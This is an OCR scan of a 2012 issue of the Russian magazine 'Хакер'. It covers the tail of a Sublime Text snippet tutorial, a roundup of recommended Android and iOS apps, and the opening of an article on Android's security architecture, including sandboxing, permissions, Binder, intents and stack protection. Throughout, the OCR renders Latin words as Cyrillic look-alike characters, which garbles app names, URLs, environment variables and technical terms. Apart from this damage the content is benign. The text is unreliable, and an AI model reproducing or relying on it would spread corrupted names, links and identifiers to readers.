ІізІомЛі-ѲѲ/Таз'І: — начальная точка, 0://... — конечная. Помимо 
этого, есть еще переменные окружения. 

$РАКАМ1 . . $РАКАМп - аргументы, передаваемые команде 
Іпзег1:5пірре1: 

&5ЕІ.ЕСТІОМ - текст, который будет выделен в сниппете при 
его срабатывании 

$ТМ_СІЖКЕІ\ІТ_І_ІМЕ - текущая строка, в которой будет 
установлен курсор при запуске триггера 
$ТМ_СІІККЕІ\ІТ_ІлІ(ЖО - текущее слово, на котором будет 
установлен курсор при запуске триггера 
$ТМ РИЕМАМЕ - имя редактируемого файла, включая его 
расширение 

$ТМ_РІІ_ЕРАТН - путь редактируемого (текущего) файла 
$ТМ_Р111_1_МАМЕ - имя пользователя 

$ТМ_І_ІМЕ_ІМОЕХ - столбец, в который будет вставлен 
сниппет, 0 - значение по умолчанию 
$ТМ_ИМЕ_МІІМВЕК - ряд, в который будет вставлен сниппет, 

1 - значение по умолчанию 
$ТМ_5ЕІ_ЕСТЕО_ТЕХТ - синоним для $5ЕІ_ЕСТІОІ\І 
$ТМ_50РТ_ТАВ5 - УЕ5, если ІігапзІаІіеТаЬзТоБрасез истина, 
иначе N0. 

$ТМ_ТАВ_5І2Е - пробелов в табуляции (настраивается опцией 
ІіаЬБіге) 

Сниппет сохраняем в папку «Раскадез — ► ІІзег» как имя_файла. 
зиЫіте-зпірреС он готов к использованию. 

Любителей хардкора отправляю к неофициальной документации. 
Кто предпочитает более гуманные способы написания сниппетов, 
рекомендую установить расширение 5апе5пірре1з, что немного об- 
легчит их написание. 



ЗАКЛЮЧЕНИЕ 

Как оказалось, 5иЫіте Тех* в связке с расширениями можно на- 
строить под такую узкую программерскую среду, как )Оиегу. Логично 
предположить, что с таким списком поддерживаемых языков ты 
можешь переквалифицировать этот редактор и под другую область. 
Выбирай модули на свой вкус, правь конфиги, учи горячие клавиши. 
Удачного коди н га! ПЕ 
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Х-МОВІІ.Е 



Евгений Зобнин (апсігоісЫгееІ.ги) 
Олег Прокопьев (аррзіисііо.огд) 




< 



Лучшие из лучших 



ОБЗОР ПРИЛОЖЕНИЙ, 
КОТОРЫЕ ДОЛЖНЫ 
БЫТЬ УСТАНОВЛЕНЫ 
НА КАЖДОМ 
СМАРТФОНЕ 



Вкусы, потребности и способ использования 
смартфона у каждого из нас свой, и все 
мы устанавливаем на девайс только 
те приложения, которые считаем нужными 
для себя. Тем не менее с некоторыми 
ситуациями и задачами рано или поздно 
сталкивается каждый, поэтому мы 
предлагаем подборку приложений, которые 
пригодятся любому, кто активно пользуется 
смартфоном. 



Апйгоігі 




ТИапіит Васкир 

АпсІгоіс1 1.0 и выше 

таігіхгеѵтіег.сот/апгігоііі/ 

бесплатно 0 ?ЖЙр 

Об этом легендарном инструменте 
знаютуже, наверное, все, но не побоюсь 
повториться. Тііапішп Васкир — лучшее 
из всех АпбгоісІ-приложений для выполне- 
ния бэкапа всего и вся. Бесплатная версия 
этого приложения не блещет особым функ- 
ционалом, однако позволяет качественно 
и корректно производить бэкап приложе- 
ний, их настроек и данных пользователя, в том числе выполнять 
резервное копирование по расписанию и только для приложений, 
версия которых изменилась. 

Заплатив же 188 рублей, ты получишь доступ к огромному коли- 
честву других функций, включая возможность заморозки приложе- 
ний, синхронизации с БгорЬох и Соодіе Бгіѵе, возможность бэкапа 
5М5 и ММ5, закладок, списков точек доступа и их паролей, под- 
держку шифрования, возможность быстрого переноса приложений 
на системный раздел, возможность восстановления приложений 
прямо из бэкапов, созданных с помощью СІоскѵѵогкМосІ, экспорт бэ- 
капа в нескольких различных форматах и многое другое. Настоящий 
бэкап-комбайн, который умеет все и определенно стоит своих денег. 



050 



ХАКЕР 11 /166/2012 







Лучшие из лучших 



СІ105І 

Соттапсіег 

Апсігоісі 1.6 и выше 

доо.дІ/РЫХѵѵ 

бесплатно 

Сбозі Соттапсіег — один из лучших 
файловых менеджеров для Апсігоісі. 

Внешний вид его зависит от положения 
экрана: в горизонтальном положении 
это будет двухпанельный файловый 
менеджер, следующий традициям ІЧогІоп 
Соттапсіег и Раг. В портретном режиме 
вторая панель будет спрятана, но доступ 

к ней можно будет получить с помощью свайпа. Менеджер под- 
держивает все основные функции работы с файлами, может ра- 
ботать с правами гооі, показывает превью изображений, иконки 
приложений, позволяет читать и редактировать текстовые 
файлы, «ходить» по ХІР-архивам, РТР-серверам и ЗМВ-дискам. 
Идеально подходит для планшетов и смартфонов с большими 
экранами. 




АігОгоісІ 

Апсігоісі 2.1 и выше 

аігсігоісі.сот 

бесплатно 








АігОгоісІ — одно 
из лучших приложе- 
ний для доступа к 
данным смартфона со 
стационарного ПК или 
ноутбука. Позволяет 
копировать файлы, 
устанавливать/удалять 
приложения, читать/ 

отправлять 5М5, редактировать контакты, прослушивать и за- 
ливать на устройство музыку, снимать скриншоты и выполнять 
многие другие операции с помощью виртуального многооконного 
рабочего стола, открываемого прямо в браузере. Для получения 
доступа к этому интерфейсу достаточно подключиться к ѴѴі-Рі- 
сети, запустить приложение и набрать в браузере адрес и пароль, 
показанный АігОгоісІ. 




Роскеі 

Апсігоісі 2.2 и выше 

деіроскеі.сот 

бесплатно 



Веб-серфинг со смартфона — не самое 
удобное занятие, но можно его упростить, 
если воспользоваться сервисом отложен- — - 
ного чтения Роскеі. Он обрежет со страни- 
цы все лишнее, оставив лишь актуальный 
текст, сопутствующие ему изображения и ^ 
видео, а затем сохранит результат, так что 
статью можно будет прочитать позднее. 

У сервиса есть бесплатное приложение для устройств под 
Апсігоісі и ЮЗ, позволяющее просматривать список сохраненных 
статей, читать их, открыв на полный экран и настроив цвета текста 
и фона, а также отправить нужную страницу в Роскеі из любого 
браузера с помощью пункта меню или кнопки «Поделиться». 






Вагсосіе Зсаппег 

Апсігоісі (версия зависит от устройства) 

доо.дІ/еѴУоІ. 

бесплатно 



Забавные черно-бе- 
лые квадраты, которые ты 
видишь рядом с описанием 
каждого приложения в этом 
обзоре, — это ОР-коды. Они 
могут содержать в себе лю- 
бую текстовую информацию, 
закодированную в виде изо- 
бражения. В данном случае 




ОР-коды содержат ссылки на страницы приложений в Соодіе РІау. 
Чтобы прочитать их и открыть, воспользуйся приложением Вагсосіе 
Зсаппег. Установи, запусти, наведи камеру на код, и ты увидишь 
ссылку и кнопку, которая откроет страницу приложения в Маркете. 




Ргеу Апіі-ТЬеН 

Апсігоісі 1.6 и выше 

ргеургоіесі.сот 

бесплатно 



Потеря или кража смартфона — обычное 
дело. Поэтому стоит заранее позаботиться 
об установке на смартфон шпионского при- 
ложения Ргеу, которое позволит отсле- 
дить местоположение девайса в режиме 
реального времени. После установки 
и регистрации приложение уйдет в сон, 
позволив пользователю войти на веб-сайт 
ргеѵрго]ес1.сот, выбрать свое устройство и при необходимо- 
сти, нажав кнопку «Потерян», отслеживать его местоположение 
на карте с помощью 6Р5, а также получать информацию о смене 
ЗІМ-карты, текущем состоянии устройства и скриншоты экрана. 
Кроме того, смартфон можно удаленно заблокировать или сбросить 
до заводских настроек. 

Владельцам рутованных смартфонов рекомендуется поместить 
приложение в системный каталог, чтобы оно не исчезло при сбросе 
смартфона до заводских настроек. 





ЗИагат 

Апсігоісі (версия зависит 
от устройства) 

вЬагат.сот 

бесплатно 



Случайно услышав интересную музы- 
кальную композицию, мы обычно начинаем 
спрашивать знакомых и проводить многие 
часы в интернете, чтобы ее найти. В XXI 
веке все это можно сделать за считаные 
секунды. Приложению Збагат достаточно 
короткого фрагмента трека, записанного 
на встроенный в смартфон микрофон, чтобы точно определить 
исполнителя, название композиции, а также дать тебе исчерпыва- 
ющую информацию о том, где ее найти. 

Буквально за несколько секунд фрагмент анализируется 
на удаленном сервере и сравнивается с базой данных из мил- 
лионов композиций, включая ремиксы и кавер-версии. Система 
работает настолько хорошо, что ошибок почти не бывает, а ответ 
«композиция не определена» возможен, только если трек совсем 
свежий и звучит впервые. 




ХАКЕР 11 /166/2012 



051 





Х-МОВИЕ 




СІиВаІапсе 

Апсігоісі 1.6 и выше 

сайта нет 

бесплатно 



Все мы проверяем баланс нашего счета 
на мобильном телефоне. Чтобы не делать 
это вручную, можно разместить на экране 
виджет СІиВаІапсе, который будет авто- 
матически посылать запросы оператору 
и показывать на экране количество денег 
на счете. Виджет имеет большую базу 
данных операторов и параметров запросов, 

так что начинает работу сразу после размещения на экране. Такие 
опции, как размер, внешний вид виджета, а также время опроса 
(после звонка, после отправки 5М5, в полночь и так далее] можно 
легко настроить по своему вкусу. 





БузІетРапеІЫіе 

Апсігоісі 1.5 и выше 

сайта нет 

бесплатно 



АпсІгоісІ-приложения могут давать сбои, 
при этом существенно потребляя память, 
нагружая процессор и тратя слишком много 
интернет-трафика. Чтобы выявить «наруши- 
телей», можно использовать монитор про- 
цессов и системы БувІетРапеІ, с помощью 
которого легко выявить пожирающие много 
ресурсов и энергии приложения, просмо- 
треть статистику использования ресурсов, оценить нагрузку на си- 
стему, получить детальную информацию о смартфоне и, конечно 
же, прибить неугодных. Приложение отличает приятный и очень 
информативный интерфейс. 






т -.1 



Витр 

І05 4.1 и выше 

ЬНР5://Ьи.тр 

бесплатно 



Спроси у любого ненавистника іРЬопе 
о главных недостатках смартфона Арріе, 
и он с большой долей вероятности скажет 
тебе, что обмен файлами по-прежнему 
является слабым местом любых ЮБ- 
устройств. 

Отчасти это верно: посылать файл 
по почте долго, передавать через іМеззаде — чуть быстрее, но 
тоже неудобно (и возможно только с другим пользователем ЮБ/ 
Мае), а использовать ВІиеІооіЬ или ѴѴі-Рі для подобных целей 
І05 вообще не разрешает. Но в Арр Біоге есть много интересных 
приложений, упрощающих обмен файлами между различными 
гаджетами. Например, Витр. Эта программка, выпускаемая и для 
І05, и для Апсігоісі, позволяет передать фотографии и контакты с 
одного устройства на другое весьма необычным способом: доста- 
точно легонько стукнуть одним устройством о другое. 



СоосІКеасІег 
Тог іРГіопе 

І05 4.0 и выше 

доогігеагіег.сот 
4,99 $ 




Приложение СообРеасіег изначально 
задумывалось разработчиками как хорошая 
читалка для РйР-файлов, но спустя не- 
сколько лет можно констатировать, что это 
одна из лучших программ для просмотра 
и управления файлами документов на ЮБ. 
бообРеасІег открывает практически любые файлы — не только 
документы МісгозоЙ (Шісе, іѴѴогк, Іхі, РТР, но даже аудио и видео. 
Программа умеет создавать и распаковывать архивы, может 
подключаться к серверам ѴѴеЬйАѴ, РТР, 5РТР и АРР, интегриро- 
вана с іСІоисІ, йгорЬох, Бкуйгіѵе и БидагБупс. Кроме того, прямо 
на іРЬопеты можешь распределять документы по папкам. Что 
касается возможностей работы с «родным» для программы форма- 
том РйР, здесь бообРеасІег предлагает сверхбыстрый движок, без 
проблем открывающий файлы весом более 300 Мб. 



ы ыл 





іСаЬ МоЬМе 

І05 3.1 и выше 

ѵтѵѵ.ісаЬ-тоЬіІе.іІе 

1,99$ 

Если тебя полностью устраивает мо- 
бильная версия Ба^агі, встроенная в ЮБ, 
то браузер ІСаЬ МоЬіІе тебе вряд ли понадо- 
бится. Однако, если тебе необходимы такие 
функции, как встроенный менеджер загру- 
зок, блокировка рекламы, полноэкранный 
режим, поддержка жестов, синхронизация 

закладок через йгорЬох или Рігеіюх Бупс, советуем обратить вни- 
мание на главного конкурента Ба^агі. ІСаЬ МоЬіІе сам по себе умеет 
многое, а поддержка дополнительных модулей расширяет его воз- 
можности еще заметнее. Ты можешь гибко настроить этот браузер 
под свои нужды. 





РІіоІоРогде2 

ІОБ 4.2 и выше 

р!іоЫогде2.сот 

2,99$ 



Прошли те времена, когда фоторедак- 
торы в Арр Біоге были в дефиците. Сегодня 
там представлены как решения для про- 
фессионалов, так и базовые программы. 

РЬоІоРогде2 — нечто среднее между ними. 

С одной стороны, это полноценный фоторе- 
дактор, работающий с фотками в исходном 
разрешении, поддерживающий слои, 25 видов настраиваемых 
фильтров и эффектов, работу с кривыми и уровнями, корректиров- 
ку баланса белого, контраста, резкости, оттенков и тому подобное. 
С другой стороны, редактировать фотографии в программе — 
сплошное удовольствие, настолько удобно организован интерфейс. 
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Лучшие из лучших 



ЬаипсИ Сепіег 
Рго 

І0Б5.1 и выше 

аррсиЬЬѵ.сот/іаипсіі-сепІег 
2,99$ 

Без джейлбрейка в док іРЬопе можно 
поместить лишь четыре иконки, поэтому 
их выбор — дело непростое, требующее 
основательных размышлений. Утилита для 
быстрого запуска І_аипсЬ Сепіег Рго точно 
заслуживает отдельного места в доке мно- 
гих іРИопе. В ее основе лежит несложная и логичная мысль: ты за- 
пускаешь программы не просто так, а чтобы выполнить определен- 
ные задачи (позвонить, написать сообщение, отправить письмо...). 
Поэтому І_аипсЬ Сепіег Рго умеет не просто запускать приложения, 
а сразу назначать им конкретные действия. Например, ты можешь 
создать ярлык «Позвонить девушке» — и одним тапом будешь 
вызывать набор номера, «Написать письмо боссу» — и сразу от- 
кроешь окно создания письма нужному адресату. 





Типеіп Радіо 

ІОБ 4.0 и выше 

Іипеіп.сот/тоЬіІе/іо5 
бесплатно 

Хотя на аппаратном уровне іРЬопе по- 
следних поколений имеют поддержку РМ- 
радио, в Арріе продолжают блокировать 
функцию радио в драйверах ІОБ. Поэтому 
тем пользователям, которые хотели бы 
слушать любимые радиостанции на своих 
яблочных девайсах, приходится доволь- 
ствоваться интернет-радио. Впрочем, стакими программами, 
как Типеіп Расііо, ты быстро забудешь об отсутствии в Ю5 нор- 
мального встроенного радиоклиента. Приложение открывает тебе 
доступ к огромному каталогу из 70 000 радиостанций (в том числе 
и большинства российских), причем искать интересные станции 
ты можешь не только по жанру, но даже по исполнителям или 
конкретным песням. Из дополнительных бонусов отметим радио- 
будильник и поддержку трансляции звука через АігРІау. 



Аіг Ѵісіео 

ІОБ 4.3 и выше 

ѵтѵѵ.іптеІЬогі.сот/аіг-ѵііІео 

2,99$ 





Помимо упомянутого АѴРІауег, есть куда 
более оригинальное решение для про- 
смотра видео без конвертации, вообще не 
предполагающее заливки видеофайлов в 
твое Ю5-устройство. Это приложение Аіг 
Ѵісіео, которое может организовать стри- 
минг видео с компьютера в домашней сети 
на іРЬопе, іРосІ ІоисЬ или іРасІ. Все устроено достаточно просто: 
на компьютер, с которого планируется вести стриминг (неважно, 
будет это Мае или РС), ставится серверное приложение Аіг Ѵісіео, 
а в его настройках указываются папки, в которых ему стоит искать 
видеофайлы. Затем ты можешь подключиться к серверу Аіг Ѵісіео 
через одноименное Ю5-приложение, найти интересующий тебя 
видеофайл и запустить его на воспроизведение. Конвертация 
будет происходить на лету, причем не с помощью іРЬопе, а силами 
транслирующего компьютера. 







АѴРІауег 

ІОБ 4.0 и выше 

ерІаѵѵѵогкБ.сот 
2,99$ 

Излюбленная в Арріе по- 
литика странных ограничений 
касается и поддерживаемых 
встроенным плеером форматов 
видеофайлов, из-за которой не 
теряют популярности универ- 
сальные видеоплееры для ІОБ 
в Арр Біоге. Для пробы всем 
пользователям хотелось бы 
порекомендовать АѴРІауег, который воспроизведет практически 
любое видео (от АѴІ и ѴѴМѴ до ХѴЮ и МКѴ) без необходимости 
предварительной конвертации. Форматы МКѴ, АѴІ, МР4, МОѴ и М4Ѵ 
могут проигрываться даже в разрешении 1080р. Пожалуй, главные 
достоинства АѴРІауег — стабильность и всеядность. В отличие 
от многих конкурентов, приложение реже всего страдает подтор- 
маживаниями, лагами звука и графическими артефактами. 





іТгапзІаІе Ѵоісе 

ІОБ 4.3 и выше 

ѵѵѵѵѵу.іігапбіаіеѵоісе.сот 

0,99$ 



Голосовой ассистент Бігі для отече- 
ственных пользователей пока представ- 
ляет мало интереса, поскольку поддержки 
русского языка нет. Но и для тех языков, 
с которыми Бігі уже дружит, простор 
для развития возможностей помощника 
огромен. Например, почему нельзя сказать 

Бігі фразу на одном языке, а в ответ услышать перевод этой фразы 
на нужный тебе другой язык? Именно так подумали создатели 
переводчика іТгапвІаІе Ѵоісе, который работает по описанному 
принципу. Ты выбираешь исходный язык и язык перевода, а потом 
произносишь нужную фразу. После секундной паузы іРЬопе зачи- 
тываеттебе перевод. На экране отображаются распознанный текст 
и результат перевода, при желании их можно отредактировать, 
а потом отправить по почте, через 5М5 или в Тѵѵіііег. 




АррЗНоррег 

ІОБ 4.3 и выше 

аррБІіоррег.сот 

бесплатно 

В Арр Біоге регулярно проводятся ски- 
дочные акции по самым разным поводам: по 
случаю различных праздников, в честь го- 
довщины попадания программы в Арр Біоге, 
перед релизом новой версии или просто 
для привлечения внимания. Проблема лишь 
в том, как отследить всю эту информацию о 
скидках. В Арр Біоге до сих пор нет раздела «Скидки дня», поэтому 
пользователи прибегают к помощи сторонних сервисов, ведущих 
мониторинг магазина приложений Арріе. Самый известный из 
них — АррБЬоррег, бесплатный клиент которого рекомендуется к 
установке на каждый ЮБ-гаджет. Ты сможешь не только следить за 
скидками, но и добавить в ѵѵізЬ-лист те приложения, которые хотел 
бы купить, как только их цена снизится. Тогда программа уведомит 
тебя сразуже, как начнет действовать очередная скидка. 
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Х-МОВИЕ 



Евгений Зобнин (апсігоісізігееі.ги) 




ОБОРОНА 
В ОСОБЫХ 
УСЛОВИЯХ 

РАЗБИРАЕМСЯ 
В СИСТЕМЕ ОБЕСПЕЧЕНИЯ 
БЕЗОПАСНОСТИ АЙОВОЮ 



АпсІгоісІ — молодая операционная система, и ее, как любую дру- 
гую новорожденную ОС, принято упрекать в отсутствии должно- 
го уровня безопасности. Антивирусные компании и профильные 
аналитики рапортуют о настоящем буме вредоносного ПО для 
АпсІгоісІ и предрекают скорое наступление армии зомби-виру- 
сов, которые опустошат кошельки пользователей. Но так ли 
уязвим зеленый робот на самом деле? 



ВВЕДЕНИЕ 



На заре своего развития АпсІгоісІ стала на- 
стоящим магнитом для нападок со стороны 
антивирусных компаний и независимых 
исследователей: инженеров боодіе обвиняли 
в недальновидности, огромном количестве 
брешей и общей ненадежности архитектуры 
АпсІгоісІ. Это касалось всех компонентов си- 
стемы, но основной удар экспертов обрушил- 
ся на реализацию механизма разграничения 
прав, который якобы ограничивал прило- 
жения друг от друга, ноим ел брешьв самой 
своей основе. 

В пример обычно приводились приложения, 
использующие эксплойты ядра І_іпих, которые 
позволяли получить права гооі, а затем сделать 
с системой все, что захочет злоумышленник. 
Этих нескольких найденных уязвимостей 
хватило, чтобы создать в желтой прессе шумиху, 
которая не улеглась и по сей день. 

Но как же обстоят дела на самом деле? 
Проблема существует или нет? Стоит ли 
бояться юзерам АпсІгоісІ за сохранность своих 
данных или перейти на Ю5 и как, если это 



возможно, защитить свои данные от злоу- 
мышленников? Обо всем этом повествует наш 
сегодняшний обзор. 



ДЫРА В ДЫРЕ? 



В своей основе АпсІгоісІ полагается на ядро 
І_іпих, которое выполняет большую часть 
грязной работы за него. На І_іпих ложатся 
такие заботы, как соблюдение прав доступа, 
слежение за процессами и их корректным 
выполнением. На деле это значит, что ни одно 
приложение АпсІгоісІ не может получить доступ 
к данным другого приложения, пока последнее 
этого не захочет. 

Реализуется это простым и превосходным 
методом: через соблюдение прав доступа. 

В АпсІгоісІ каждое приложение — это отдель- 
ный пользователь со своими правами доступа 
и полномочиями. Каждое приложение в такой 
системе получает свой собственный идентифи- 
катор пользователя (ІІЮ) и собственный каталог 
внутри каталога /сіаіа, так что все его данные 
защищаются с помощью простых прав доступа, 
которые разрешают самому приложению читать 



собственные файлы, но запрещают делать это 
любому другому процессу. 

В АпсІгоісІ это называется песочницей 
(вапсІЬохіпд), которая позволяет сберечь данные 
соседних приложений друг от друга, не позво- 
лив зловреду утащить частную информацию, 
сохраненную любым приложением системы. 

В песочницу попадают абсолютно все прило- 
жения, включая заранее предустановленные 
на аппарат. Фактически лишь небольшая часть 
АпсІгоісІ работает с правами гооі, а именно на- 
чальный процесс гудоіе, выполняющий функции 
контроля за исполнением приложений, и не- 
большая часть системных сервисов. Все осталь- 
ные приложения всегда работают в песочницах, 
поэтому зловред, даже прошедший процедуру 
«впаривания» пользователю, не можетутащить 
ничего ценного, кроме содержимого 50-карты, 
доступ к которой по умолчанию открыт всем 
(позже мы еще вернемся к этому). 

Кроме данных отдельно взятых приложений, 
для доступа закрыта также базовая инсталля- 
ция АпсІгоісІ, размещаемая на отдельном раз- 
деле внутренней І\ІАІ\Ю-памяти и подключенная 
к каталогу /зузіет. По умолчанию она смонтиро- 
вана в режиме только для чтения и, в принципе, 
не хранит в себе никакой конфиденциальной 
информации (для ее размещения также исполь- 
зуются песочницы в /сіаіа), поэтому каким-то 
хитрым образом прописаться в автозагрузку 
или модифицировать системные компоненты 
не получится (если, конечно, не использовать 
эксплойты для получения прав гооі, о чем я под- 
робнее расскажу ниже). 

Для общения приложениям доступно не- 
сколько вариантов ІРС, причем родные для 
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Оборона в особых условиях 



І_іпих средства коммуникации, такие как раз- 
деляемая память и сокеты, доступны только 
процессам, принадлежащим одному приложе- 
нию, да и то лишь в том случае, если хотя бы 
часть приложения написана на компилируемом 
в машинный код языке, то есть с использова- 
нием АпсІгоісІ І\ЮК. Во всех остальных случаях 
приложения смогут использовать Віпсіег для 
безопасного обмена сообщениями и интенты 
для вызова сторонних приложений (о них мы 
также поговорим ниже). 

Интересно, что в АпсІгоісІ, начиная с версии 
2.2, есть понятие администратора устройства, 
но значит оно совсем не то, что под ним пони- 
мают пользователи ІІІМІХ и ѴѴіпсІоѵѵз. Это просто 
АРІ, с помощью которого приложение может из- 
менять политику безопасности паролей, а также 
запрашивать необходимость в шифровании 
хранилища данных и производить удаленный 
вайп смартфона. Это своего рода костыль, 
который был придуман в ответ на запросы 
корпоративных пользователей АпсІгоісІ, которые 
хотели получить больший контроль над без- 
опасностью данных на смартфонах сотрудников. 
Фактически этим АРІ может воспользоваться 
любое приложение, но для этого пользователь 
должен явно подтвердить свое намерение 
предоставить приложению такие полномочия. 
Также в последних версиях АпсІгоісІ появилась 
возможность загрузки устройства в безопасном 
режиме, когда пользователь получает доступ 
только к предустановленным приложениям. Она 
может понадобиться в случае компрометации 
устройства сторонним приложением. 

Начиная с версии 3.0, АпсІгоісІ имеет встро- 
енную поддержку шифрования всех пользо- 
вательских данных с помощью стандартной 
подсистемы бтсгурі ядра І_іпих. Шифрование 
производится в отношении того самого ката- 
лога /сіаіа алгоритмом АЕ5128 в режиме СВС 



и Е55ІѴ:5НА256 с помощью ключа, генериру- 
емого на основе пароля, который необходимо 
ввести во время загрузки ОС. При этом стоит 
учитывать, что карта памяти не шифруется, 
поэтому сохраненные на ней данные остаются 
полностью открытыми. 



ПРИЛОЖЕНИЯ И ПРАВА ДОСТУПА 



Наряду с песочницей, одним из основных меха- 
низмов системы безопасности АпсІгоісІ являются 
права доступа приложений к функциям системы 
АпсІгоісІ (привилегии), которые позволяют 
контролировать, какие именно возможности ОС 
будут доступны приложению. Это могут быть как 
функции работы с камерой или доступ к файлам 
на карте памяти, так и возможность использова- 
ния функциональности, которая может привести 
кутечке информации со смартфона (доступ 
в Сеть) либо к трате средств пользователя со 
счета мобильного оператора (отправка 5М5 
и совершение звонков). 

У АпсІгоісІ есть замечательная особен- 
ность: абсолютно любое приложение обязано 
содержать в себе информацию о том, какие 
именно из функций АпсІгоісІ оно может ис- 
пользовать. Эта информация заключена в 
файле АпсІгоісІМапіІюзСхтІ внутри АРК-файла 
и извлекается инсталлятором перед установкой 
приложения для того, чтобы пользователь смог 
ознакомиться стем, к какой функционально- 
сти смартфона приложение сможет получить 
доступ. При этом пользователь должен в обя- 
зательном порядке согласиться с этим списком 
перед установкой приложения. 

На заре становления АпсІгоісІ такой подход 
был раскритикован как слишком наивный, 
однако, как показало время, его эффективность 
получилась чрезвычайно высокой. Несмотря 
на то что большинство пользователей игнори- 
рует список привилегий перед установкой при- 
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ложения, многие ознакомляются с ним и, если 
обнаруживают какие-то несоответствия (на- 
пример, когда игра запрашивает возможность 
отправки 5М5 или доступ к адресной книге), 
рассказывают об этом в отзывах и ставят одну 
звезду. В результате приложение очень быстро 
получает низкий суммарный рейтинг и большое 
количество негативных комментариев. 

Также хочется заметить, что все возможные 
привилегии достаточно четко и логично раз- 
делены, благодаря чему злоупотребления при- 
вилегиями практически не бывает. Например, 
приложение может потребовать возможность 
читать 5М5, но не отправлять их или получать 
уведомления о пришедшем сообщении. Фак- 
тически единственный серьезный недостаток 
системы привилегий был найден только в том, 
что инженеры Ооодіе вообще не предусмотрели 
никаких ограничений на чтение карты памяти 
(записьтем не менее ограничена), посчитав 
это бессмысленным для съемных накопителей. 

В свое время эта «брешь» привела к возможнос- 
ти получения координат смартфона, выуженных 
из кеша стандартного приложения «Галерея», 
который хранился на карте памяти. Что, в свою 
очередь, вынудило боодіе добавить в настройки 
последних версий АпсІгоісІ опцию, после акти- 
вации которой система будет явно спрашивать 
пользователя о возможности доступа какого- 
либо приложения к 50-карте. 

Еще одна важная особенность такой систе- 
мы заключается в том, что пользовательские 
настройки всегда будут приоритетнее запросов 
приложений, а это значит, что, если пользо- 
ватель отключит ЗР5, приложение никак не 
сможет включить его самостоятельно даже при 
наличии всех прав на использование 6Р5. При 
этом некоторые функции ОС недоступны для 
приложений вовсе. Например, манипулировать 
5ІМ-картой имеет право только операционная 
система, и никто, кроме нее. 

Проверка привилегий идет на самом низком 
уровне ОС, в том числе на уровне ядра І_іпих, так 
что для обхода этой системы безопасности злов- 
реду придется не только получить права гооі на 
устройстве, но и каким-то образом скомпромети- 
ровать ядро, что гораздо более сложная задача. 




Какуже было сказано выше, приложения могут 
обмениваться информацией, используя стан- 
дартные для АпсІгоісІ средства коммуникации 
Віпсіег, интенты (Іпіепіз) и провайдеры данных 
(Сопіепі Ргоѵібег). Первый представляет собой 
механизм удаленного вызова процедур (РРС), 
реализованный на уровне ядра І_іпих, но контро- 
лируемый системным сервисом Зегѵісе Мападег. 
С точки зрения программного интерфейса 
Віпсіег является всего лишь средством импорта 
объектов из другого приложения, но с точки 
зрения безопасности полностью контролирует- 
ся обсуждаемым выше механизмом разграни- 
чения прав доступа. Это значит, что приложения 
смогут получить доступ друг к другу только в том 
случае, если оба этого захотят. Это особенно 
важно в свете того, что в АпсІгоісІ Віпсіег явля- 
ется основным средством коммуникации, на 
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Увидеть, какому ІІШ принадлежит приложение, 
можно с помощью любого менеджера задач 

основе которого построен графический интер- 
фейс, а также другие компоненты ОС, доступные 
программисту. Доступ к ним ограничивается 
с помощью обсуждаемого выше механизма 
привилегий. Как системные компоненты, так 
и сторонние приложения могут ограничивать 
доступ к своей функциональности с помощью 
декларации прав на доступ к своим функци- 
ям. В случае системных компонентов все они 
описаны в документации для программистов 
АпсІгоісІ-приложений. Независимые разработчи- 
ки, которые хотят открыть АРІ к своим прило- 
жениям, должны описать требуемые для этого 
привилегии в АпсІгоісІМапіІюзЕхтІ и опублико- 
вать соответствующую документацию. Все это 
относится также к провайдерам данных (Сопіепі 
Ргоѵібег), специальному интерфейсу (также 
реализованному поверх Віпсіег), с помощью 
которого приложения могут открывать доступ 
к своим данным другим приложениям. В АпсІгоісІ 
провайдеры данных везде, это и адресная кни- 
га, и плей-листы, и хранилище настроек. Доступ 
к ним опять же ограничивается с помощью меха- 
низма привилегий и правдоступа. 

Поверх Віпбегтакже реализована так назы- 
ваемая технология интентов, простых широко- 
вещательных сообщений. Приложения могут по- 
сылать их «в систему» с целью вызова внешних 
приложений для совершения какого-либо дей- 
ствия. Например, приложение может исполь- 
зовать интенты для вызова почтового клиента 
с указанием адреса, открытия веб-страницы, 
каталога в файловой системе и всего, что может 
бытьзаписано в виде ІІРІ. Система автома- 
тически находит все приложения, способные 
принимать данный тип интентов (а точнее, ІІРІ- 
адресов), и передает ІІРІ им (а точнее, одному 
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Ознакомиться со списком полномочий приложения 
можно и после его установки 

из них, выбранному пользователем). То, какие 
типы интентов может принимать и обрабатывать 
приложение, определяет программист во время 
сборки приложения. Кроме того, он может ис- 
пользовать фильтрацию по содержимому ІІРІ, 
чтобы избежать «спама». 

Сами по себе перечисленные механизмы об- 
мена данными и вызова функций приложений, 
контролируемые с помощью системы привиле- 
гий, в АпсІгоісІ реализованы достаточно четко 
и ясно, однако они могут привести к проблемам 
в том случае, если программист недостаточно 
серьезно относится к декларации привилегий, 
необходимых для доступа к своему приложению. 
Это может привести кутечкам информации или 
возможности задействования функционально- 
сти приложения кем угодно. Например, в первых 
версиях БгорЬох для АпсІгоісІ имелась проблема 
с правильным определением привилегий, кото- 
рая приводила ктому, что любое установленное 
приложение могло использовать БгорЬох- 
клиент для заливки какой угодно информации 
на «облачный диск» ( ѵѵѵѵѵѵ.зесигеіізі.сот/еп/ 
ас!ѵІ50гіе5/45572 ). 



ЗАЩИТА ОТ СРЫВА СТЕКА 



Для защиты приложений, созданных с ис- 
пользованием АпсІгоісІ І\ЮК, а также системных 
компонентов, написанных на языке Си, АпсІгоісІ 
включает в себя обширный набор механизмов 
защиты от срыва стека, в свое время реализо- 
ванных самыми разными разработчиками для 
различных проектов. В АпсІгоіс1 1.5 системные 
компоненты были переведены на использо- 
вание библиотеки заію-іор ( сосіе.доодіе.сот/р/ 
заіе-іор ), реализующей функции безопасного 
выполнения арифметических операций над 



целыми числами (защита от іпіедег оѵегЛоѵѵ). 

Из ОрепВББ была позаимствована реализация 
функции бтаііос, позволяющая предотвратить 
атаки с использованием двойного освобожде- 
ния памяти и атаки согласованности чанков, а 
также функция саііос с проверкой на возмож- 
ность целочисленного переполнения во время 
операции выделения памяти. Весь низкоу- 
ровневый код АпсІгоісІ, начиная с версии 1.5, 
собирается с задействованием механизма 
компилятора 6СС РгоРоІісе для защиты от срыва 
стека на этапе компиляции. 

В версии 2.3 в коде были устранены все 
возможные уязвимости манипуляции со 
строками, выявленные с помощью сборки ис- 
ходных текстов с флагами '-Могтаі-зесигііу', 
'-ѴѴеггоМогтаІ-зесигіІу', а также применены 
«железные» механизмы защиты от срыва 
стека (бит N 0 еХесіПе (І\ІХ), доступный начиная 
